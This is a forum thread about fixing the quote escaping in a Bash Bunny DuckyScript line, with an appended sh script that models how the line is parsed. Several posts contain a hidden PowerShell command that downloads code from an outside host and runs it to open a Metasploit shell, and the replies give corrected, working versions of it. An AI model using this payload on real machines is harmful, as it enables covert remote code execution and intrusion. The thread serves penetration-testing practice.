
Stuck with simple DuckyScript


rizzah


Hi, I'm testing something with my BB and I got stuck on a DuckyScript line.

Q STRING powershell.exe -nop -w hidden -c \$H=new-object net.webclient\;IEX \$H.downloadstring\(\’http://192.168.145.138/ztgBcA7n\'\)\;

In my opinion this should be OK, however when executed this is what it types in:

Q STRING powershell.exe -nop -w hidden -c $H=new-object net.webclient;IEX $H.downloadstring(

I don't understand why it doesn't escape the ' properly, but that's probably because of my own lack of knowledge :-) Could someone help me out?


With the v1.1 firmware, you should now be able to use 'RUN WIN powershell ...'.

If you do not want to put the DuckyScript in a separate file, which is generally recommended when you have more than a few lines, I would create a payload that opens Notepad and types a few lines to see where you are having issues. Keep in mind that the STRING you are printing is interpreted by bash prior to being fed to the HID device.

First guess without trying anything is that you don't need to escape the single quote after 'downloadstring'.


@LowValueTarget Thanks for your reply. I tried it with WIN RUN powershell. Results were the same.

I'm trying to create the same thing as on this page: https://cyberarms.wordpress.com/2017/03/27/bash-bunny-windows-remote-shell-using-metasploit-powershell/

Everything seems to work fine, except for the PowerShell line he enters in the 'run' field. I tried with and without escaping the single quote; that did not make a difference. When I remove the single quote it pastes the whole line just fine. So it does seem the problem is with the single quote; the question is why it doesn't get escaped properly. It did seem to work in the tutorial I pasted above and also in some online video I've seen.


I think it's because of: \(\’http://192.168.145.138/ztgBcA7n\'\)\;

The first one isn't a single quote but a curly apostrophe, and the ending one is a single quote.

And there is no definition for the curly apostrophe ’ in your language.json file.

Edited by elkentaro

On 4/14/2017 at 6:26 AM, rizzah said (original post, see above):

Or you can enclose your whole string command in double quotes, and then you only have to escape the "&"s and any other double quotes you want to show up.

Q STRING "powershell.exe -nop -w hidden -c \"\$H=new-object net.webclient;IEX \$H.downloadstring('http://192.168.145.138/ztgBcA7n');\""

Or, shortened:

Q STRING "powershell.exe -nop -w hidden -c \"IEX (new-object net.webclient).downloadstring('http://192.168.145.138/ztgBcA7n')\""

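To illustrate the two points made in this thread (the STRING text is parsed by bash before the HID layer sees it, and a character that is missing from language.json stops the typing), here is a small POSIX sh model. It is an added example, not code from the thread or from the Bash Bunny firmware; the Q stand-in, the ASCII-only keyboard map and the harmless sample lines are all assumptions.

```shell
#!/bin/sh
# Added example, not code from the thread or from the Bash Bunny firmware: a local
# model of the two stages a "Q STRING ..." line goes through before it is typed.

# Stage 1: bash parses the line. By the time the arguments reach Q, quote removal
# has already happened, so "$*" is exactly what the HID layer is asked to type.
# (Stand-in for the real Q function, which is not modelled here.)
Q() {
    shift                       # drop the DuckyScript command word (STRING)
    printf '%s\n' "$*"
}

# Stage 2: the keyboard map. Assumed here: a stock language.json maps printable
# ASCII only (0x20-0x7E) and typing stops at the first character with no mapping.
# That is how one curly apostrophe cuts the whole line short on the target.
type_as_hid() {
    printf '%s' "$1" | LC_ALL=C sed 's/[^ -~].*$//'
    echo
}

# Lint helper: print the tail of the string from the first unmapped character
# and return 1; return 0 and print nothing when every character is mappable.
find_unmapped() {
    unmapped=$(printf '%s' "$1" | LC_ALL=C sed 's/^[ -~]*//')
    [ -z "$unmapped" ] && return 0
    printf 'unmapped character(s) starting at: %s\n' "$unmapped"
    return 1
}

# Constructed sample lines (harmless stand-ins for the PowerShell line in the thread).
# 1. The original pattern: unquoted, backslash-escaped, with a curly open quote (\’).
curly_line=$(Q STRING notepad.exe \’C:\\temp\\notes.txt\')
# 2. The double-quoted pattern: only $ and " need a backslash; ; ( ) ' do not.
fixed_line=$(Q STRING "powershell.exe -c \"\$a=1; \$a\"")
# 3. Caveat: inside double quotes bash keeps a backslash before a single quote.
mixed_line=$(Q STRING "say('hi\')")

printf 'parsed : %s\n' "$curly_line"
printf 'typed  : %s\n' "$(type_as_hid "$curly_line")"
find_unmapped "$curly_line" || true
printf 'parsed : %s\n' "$fixed_line"
printf 'typed  : %s\n' "$(type_as_hid "$fixed_line")"
printf 'parsed : %s\n' "$mixed_line"
```

Run it under a UTF-8 locale to see the curly quote; the typed line for the first sample stops right after `notepad.exe `, just as the thread's truncated output stops before the quote.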
